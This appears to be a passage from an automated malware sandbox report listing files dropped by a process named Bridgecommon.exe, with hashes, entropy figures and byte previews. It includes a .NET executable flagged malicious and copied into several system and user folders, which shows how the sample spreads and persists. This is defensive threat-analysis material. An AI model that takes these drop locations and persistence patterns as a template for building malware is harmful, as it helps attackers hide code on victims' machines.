                                                                                            SHA1:4739EC514F32479517A5A4ABDA436FDE20DFC854
                                                                                            SHA-256:82B68FE5A97F79A472C01DF7BA9070E666D68A3DF9FDE1C605004BD13F7932E0
                                                                                            SHA-512:AF49C73D684A3EFC0042084BBE3BCD3F375309AC431A2ABC2B36CEA24CA5D065DEEEF29E47AC5A076A66953E31F04741278D26046E2E6DDBD842A36B227401E5
                                                                                            Malicious:false
                                                                                            Preview:....... .......A.......X\...;...{......................0.!..........{A. 4...|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................X.~ 4...|..................=&.{ 4...|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\SoftwareDistribution\039065625c59a1

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:ASCII text, with very long lines (851), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):851
                                                                                            Entropy (8bit):5.889267674031539
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MmeXeoYld/VlJb1D4TTOgNgtJHCVwt9BEvc2ZM:MRYd/VztgNOi29BAc2ZM
                                                                                            MD5:64E2F8F9B5E45158435E94A81ED43E3C
                                                                                            SHA1:7602A97AFEDBC563B334F7ADB7E5E399236F5827
                                                                                            SHA-256:84104B37F2AF8C82606DD383C51F2C3CA439825085A7EC07E9D4F193A2C213D0
                                                                                            SHA-512:44C8165982F7E098457AB0EFBFD77A2C08BE04DC17A9AAA2F9C3C32F0A1E95FFB9F46DFBF08EFC175CBBF1B9D45CAAED434B6A16848DEAB8E9529B5AC770777D
                                                                                            Malicious:false
                                                                                            Preview:ZYccQP1XXrjwwd8UWfq5X9jOXxikRRDS24gbKOJ6FLMVWDmpqWRh72cZzNEdqQFFoQ417hKIVu0MxN1TK345AgUAcGm6JqPyFGrGJurJLJLNBQmlWvSxWKEI53Z15O8oeBGqgvJaLvt1UG8LdAjXYbc5BiKQV0N7KgtAJ5Fll1mlaNyy4NX4okQCjLo7k3FUhwrxX8Bi58wgz1eyuVVHdTSjQqb8QHAswREogAb5Mz8qytNsr0NPh71NdHgrhDRy7EthwzSt4Z5oUmvgdtRa4vKza0KYdtYIiKttAp51hdUHCN31WAOxw03L44G6p4PKBwFJ2BgxyZ2baCwN7SBdekWrQhzFi8MnNKGQHt8Vdb9W7cv1I39W2vqaZY2VLaOzNOOQ5fGNUqADkAtyw87p90vbdq0s0nKCMKJsOe5mwvCMvmzZoEjNdjzXdwwPoXXqg81a0BjRCU2Nyjq10bEwE6inUwPbrq7ZYVqxvZineRKIqmi4G5YNTkmjZOFEvHkVXdyc32Ga2bRxva6sNVVwRuGxsGYhUe1WqzvNxFANz8V1Tzx8SW1awxEmXAuweiGXj4G6os4HUH7TZOe3TZP7nbj3uI0wVOsQ17RZt0TjctGpzvNIg1cFTIuIUMMg1IvFYrbc6EKdFpf3V4D94sPewn6sMJEgoxsU7AQITvMbr9Aon0xZJMlJ2RTvvsPxAnyR7L5Un5qJfxxwnSFWVoXbLibqrfWkgYbDKsqc4dwNgcnEdgHdn3bVQWGYtPnIjFnHWul4lmb22J5t5XMKX36m7FwymStpzooazgrt5N2BcjdGbWdVDdupJAJR8xSS3wCOfe4YqcPKB5KYlpWPyXm

                                                                                            C:\ProgramData\SoftwareDistribution\nFQRHbQjcuhfqIAubZpdQD.exe

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1719296
                                                                                            Entropy (8bit):7.457136013265021
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                                            MD5:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            SHA1:77DC3F7D83728294C49298DB82DD0E668ADC3A73
                                                                                            SHA-256:8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                                                                                            SHA-512:4AC940FA7CE3C8A2A646639A5B00C5C8A1DCAFCFBA460782068446A321455CF5AF10E1E6AE4E6753150BEAB7D2431A7C38192787B32C4E508B73F4B3AC843956
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%!g.................4..........~R... ...`....@.. ....................................@.................................0R..K....`.. ............................................................................ ............... ..H............text....2... ...4.................. ..`.rsrc... ....`.......6..............@....reloc...............:..............@..B................`R......H.......................L...Hq...Q.......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8y......0.......... ........8........E....d.......*...............8_......... ....~....{....9....& ....8....~....(S... .... .... ....s....~....(W....... ........8{...8.... ....~....{....:f...& ....8[...~....:V... ....8G.......~....([...~....(_

                                                                                            C:\ProgramData\nFQRHbQjcuhfqIAubZpdQD.exe

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1719296
                                                                                            Entropy (8bit):7.457136013265021
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                                            MD5:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            SHA1:77DC3F7D83728294C49298DB82DD0E668ADC3A73
                                                                                            SHA-256:8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                                                                                            SHA-512:4AC940FA7CE3C8A2A646639A5B00C5C8A1DCAFCFBA460782068446A321455CF5AF10E1E6AE4E6753150BEAB7D2431A7C38192787B32C4E508B73F4B3AC843956
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%!g.................4..........~R... ...`....@.. ....................................@.................................0R..K....`.. ............................................................................ ............... ..H............text....2... ...4.................. ..`.rsrc... ....`.......6..............@....reloc...............:..............@..B................`R......H.......................L...Hq...Q.......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8y......0.......... ........8........E....d.......*...............8_......... ....~....{....9....& ....8....~....(S... .... .... ....s....~....(W....... ........8{...8.... ....~....{....:f...& ....8[...~....:V... ....8G.......~....([...~....(_

                                                                                            C:\Users\Default\039065625c59a1

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:ASCII text, with very long lines (997), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):997
                                                                                            Entropy (8bit):5.91468534654215
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:g0WBmN3kXxkrmfkfOmJvpJnkZB2lRq0IAimNPE4hd0z:tN0BYmsldkZ1/Ai69hCz
                                                                                            MD5:973DF89C7C019CD73D6C58BA1703CE73
                                                                                            SHA1:DBB30F90EDF8A3F302504205EA6ED4607309FCB0
                                                                                            SHA-256:BD120CA73A2747B3E2A62742464A278C8BDC8268E4D4D4485CD399247D9FE744
                                                                                            SHA-512:099EBBA5BE1E7BBB29F805B1B39A5AD57503BB96CEDACFF8AEC8C6DFD6CEBCBB11FC603E7F70DF825426B7BA0976FED4EE0B33FD7A768296E99EF81609B51A7B
                                                                                            Malicious:false
                                                                                            Preview:8Cl0qcTDBqMQY3rNK4v3zOsPPhvkQeLBzAdxbfMVef9TjgARO3bwXXKtTWlJrswhfLbXZ4vprZZTPZqtgdVXCYnbzudF3DovtcxXFm2UHwF781d4q1mNXZeHi9hoaqvnvnkxlSo4kAPQTqd8RjZCbaYT8qzFEO4aBbLURqSXNsmWJNx1giX1RtMUPQy5dizWGyP2eIrkQBysxBJu37jf0CJRO1FA1X4p2QQV85WX1wkP5dgNGECf8TfDp7nnCrs3HI0hvyv7lLoDc3WvU24wUYrjuMpBStVKEqIwn9cRTE4woblvk2TKw6isbQwjJup10e9vvkHUZndQe44Sl3aaaKXIIZUWM3IiZC5JbzAAu8uJcSNhWe7PTPbqH1nVPvIge40c8u0v3ZpbZOpzMxAs52PJkPCkMpv80NohbvilnMW4j9Q3MxJbuZllpq1ssQiNorlLjHXaPZFsgUkl9JXYfUNamD2u302WnIP2YEUEasMVU3FUGQti2JrUdKjgPmhYgsEYFsM5zT8xH2Gt7homHTdea5YNexzxLxzlyrPXDytjK4MlE0ir84RMPk7JT9aBeLmUDf4QSQjSk3TgsxJnPHzQfmVOtFEEXsF9R2hi6RYrV8mVQaaf0wwWVVyaJqgMMf52yUO0Pkr7tH5g9A7SpiNl6tn6DHYPuLf0Dug6MkPPEynOaRaJtNhnRU5FqSwILcMhmEcPdAGFS7gHGZfwqPfho1itybQ4xHEmlFlVyLptHcUUyx9QwAb66p3vgtaCuMRL33gAyJ7fjwZLgO5Ac9HwpHq5MzzFun84LJa4R8cmD6WJQrORxajuEfgvNlx8U1v6yeAXyAtdgettvgpfliSUDNzpmorpLeSMKZVvr1dwqFOjvxAq6SWvjb2kpUuJTDSCMgiVK4xuFfn89P4zoAt3HgnthvGXGTcnxMXOOogBemqDy4kZa5fTTZ4p3zyZxaovC9Kw2pl9erYf0j4mKr6LyJTYSsVZ0GNE8

                                                                                            C:\Users\Default\nFQRHbQjcuhfqIAubZpdQD.exe

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1719296
                                                                                            Entropy (8bit):7.457136013265021
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:/KEYWAa5pLMzdFGZWWs5cRtb6kMgmrmtXVdaNjTXf3qtzdzkkJj6:/p1JAz5cjb6k4cFdaNjTXfa/
                                                                                            MD5:477DB3DE46B7779B63495A8BDB279F2C
                                                                                            SHA1:77DC3F7D83728294C49298DB82DD0E668ADC3A73
                                                                                            SHA-256:8B0B6F7BA3C1C98FDC17CEB74E37057793E104DC92AA4D4319D71411B3E56366
                                                                                            SHA-512:4AC940FA7CE3C8A2A646639A5B00C5C8A1DCAFCFBA460782068446A321455CF5AF10E1E6AE4E6753150BEAB7D2431A7C38192787B32C4E508B73F4B3AC843956
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 83%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....%!g.................4..........~R... ...`....@.. ....................................@.................................0R..K....`.. ............................................................................ ............... ..H............text....2... ...4.................. ..`.rsrc... ....`.......6..............@....reloc...............:..............@..B................`R......H.......................L...Hq...Q.......................................0..........(.... ........8........E....M.......)...N...8H...(.... ....~....{....:....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8y......0.......... ........8........E....d.......*...............8_......... ....~....{....9....& ....8....~....(S... .... .... ....s....~....(W....... ........8{...8.... ....~....{....:f...& ....8[...~....:V... ....8G.......~....([...~....(_

                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Bridgecommon.exe.log

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:CSV text
                                                                                            Category:dropped
                                                                                            Size (bytes):1306
                                                                                            Entropy (8bit):5.353303787007226
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUN+E4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT4T
                                                                                            MD5:BD55EA7BCC4484ED7DE5C6F56A64EF15
                                                                                            SHA1:76CBF3B5E5A83EC67C4381F697309877F0B20BBE
                                                                                            SHA-256:81E0A3669878ED3FFF8E565607FB86C5478D7970583E7010D191A8BC4E5066B6
                                                                                            SHA-512:B50A3F8F5D18D3F1C85A6A5C9A46258B1D6930B75C847F0FB6E0A7CD0627E4690125BB3171A2D6554DEBE240ADAB2FF23ABDECA9959357B48089CFBF1F0D9FD8
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\nFQRHbQjcuhfqIAubZpdQD.exe.log

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\nFQRHbQjcuhfqIAubZpdQD.exe
                                                                                            File Type:CSV text
                                                                                            Category:dropped
                                                                                            Size (bytes):847
                                                                                            Entropy (8bit):5.354334472896228
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                            MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                            SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                            SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                            SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                            Malicious:false
                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):64
                                                                                            Entropy (8bit):1.1940658735648508
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:NlllulJnp/p:NllU
                                                                                            MD5:BC6DB77EB243BF62DC31267706650173
                                                                                            SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                            SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                            SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                            Malicious:false
                                                                                            Preview:@...e.................................X..............@..........

                                                                                            C:\Users\user\AppData\Local\Temp\38RzWavH4j

                                                                                            Download File
                                                                                            Process:C:\hyperContaineragent\Bridgecommon.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):25
                                                                                            Entropy (8bit):4.323856189774723
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:2eqown:2pow
                                                                                            MD5:AD462ADFD6F7DB5D61C82ADE46C32CD9
                                                                                            SHA1:FC8E3B45F02C861A34313E14D5DC8E6D1441380B
                                                                                            SHA-256:7D507C394FC8BBB96C0A5156736DE7A3F75D92BD810899407EA13BCD0033C0F0
                                                                                            SHA-512:A215DC643C1881F619C8C812D513980F87DB31B6A4D5823322CBBEE547DB600F45DA3B11338EB33696F76B594D65FE2CEA36133F317890C5493C06A088BA0AEC
                                                                                            Malicious:false
                                                                                            Preview:HpgPl6cFpkOjoNzvpSaCefKpU

                                                                                            C:\Users\user\AppData\Local\Temp\RESA4DA.tmp

                                                                                            Download File
                                                                                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6e8, 10 symbols, created Wed Nov 6 00:52:13 2024, 1st section name ".debug$S"
                                                                                            Category:dropped
                                                                                            Size (bytes):1952
                                                                                            Entropy (8bit):4.544103343404748
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:H1AbW96XOBWDfHvwKXbNyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0++UZ:PBsYKXbMluOulajfqXSfbNtmh5Z
                                                                                            MD5:E7698422C4A90565F1FB2CB5E3B118FE
                                                                                            SHA1:C04B55B64762D57F81C8C9F53D87AB6489239E12
                                                                                            SHA-256:03ACBFD3945C01CFF567353A55629101F80B6668C29996FADF51D9380178BEE0
                                                                                            SHA-512:AFBB2A7DADD160445F50E6093CBF0D9969349C55AA329A35CED0C63112978600F41F4225AF3A2B31301608DB5CBA3F9B49DF96211775249DA5E09AEBCFFBE7B3
                                                                                            Malicious:false
                                                                                            Preview:L.....*g.............debug$S........8...................@..B.rsrc$01................d...........@..@.rsrc$02........p...x...............@..@........<....c:\Windows\System32\CSCA1C1A0ABC4644F3ABFA5FB833E2CF3E.TMP..................r.av..t.y..............4.......C:\Users\user\AppData\Local\Temp\RESA4DA.tmp.-.<....................a..Microsoft (R) CVTRES.^.=..cwd.C:\hyperContaineragent.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0hfdxejy.ys3.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_alrtipdn.lef.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blfzhyje.y0f.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cttytmmf.mdo.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eqvomigd.wpn.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g1egdvfg.vog.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h20mkdfc.gdh.psm1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hl54rccu.1o3.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kxq32cwv.hoy.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                            Malicious:false
                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0dsflvp.bqc.ps1

                                                                                            Download File
                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):60
                                                                                            Entropy (8bit):4.038920595031593
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
